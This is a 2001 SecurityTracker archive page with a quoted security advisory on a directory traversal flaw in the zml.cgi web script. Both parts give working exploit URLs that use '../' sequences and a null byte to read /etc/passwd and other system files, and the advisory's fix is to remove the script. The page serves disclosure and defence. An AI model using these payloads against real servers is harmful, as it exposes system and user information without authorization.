SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Web Server/CGI)  >  Zml.cgi Vendors:  Timmerman, Abe
Zml.cgi Markup Language Processor Discloses Files on the Server to Remote Users
Date:  Dec 31 2001
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Description:  Blackshell reported an information disclosure vulnerability in the "zml.cgi" script. A remote user can view files located anywhere on the server.

It is reported that a remote user can supply a URL GET request containing the string "../" to traverse the directory and view any file on the server that is readable by the web server.

Some example exploit URLs are provided:

http://[targethost]/cgi-bin/zml.cgi?file=../../../../../../../../../e tc/passwd%00
http://[targethost]/cgi-bin/zml.cgi?file=../../../../../../../../../etc/fstab%00
http://[targethost]/cgi-bin/zml.cgi?file=../../../../../../../../../etc/mo td%00
Impact:  A remote user can view any file on the server that is readable by the web server.
Solution:  No solution was available at the time of this entry.

The author of the report recommends removing the CGI script from your web server.
Vendor URL:  www.jero.cc/zml/zml.html (Links to External Site)
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on Red Hat Linux with Apache web server
Reported By:  blackshell@hushmail.com
Message History:   None.

 Source Message Contents
Date:  Mon, 31 Dec 2001 00:04:20 -0800
From:  blackshell@hushmail.com
Subject:  [VulnWatch] blackshell2: zml.cgi remote exploit

 


-----BEGIN PGP SIGNED MESSAGE-----

#####################################################
#--blackshell security advisory no2--#		    #
#--zml.cgi remote exploit--#			    #
#####################################################

########################
vendor details & history
########################

zml.cgi for webservers
by jero.cc

http://www.jero.cc/zml/zml.html

##################
details of exploit
##################

this is a classic CGI bug which uses ../../../../ to read remote files.

example:

http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00
http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/fstab%00
http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00

this may be used by the attacker to gather vital details about the remote server.

###
fix
###

remote this script from your webserver

####
note
####

this test was conducted on apache box, and a redhat server.
under no circumstances are we liable for any misuse of this
information

########
hi's to:
########

blackshell dev team, #!blackshell contributors and anyone who
over the years has helped us make us what we are

#######
contact
#######

blackshell@hushmail.com

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wl8EARECAB8FAjwwHhcYHGJsYWNrc2hlbGxAaHVzaG1haWwuY29tAAoJED2VGGGCU8ut
bHgAn28OCJjLmUCrk+sePY5ukAfYfopJAJ0Y54Te+w7HIVwXeUdSGt1PmPuTAA==
=yPg1
-----END PGP SIGNATURE-----


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC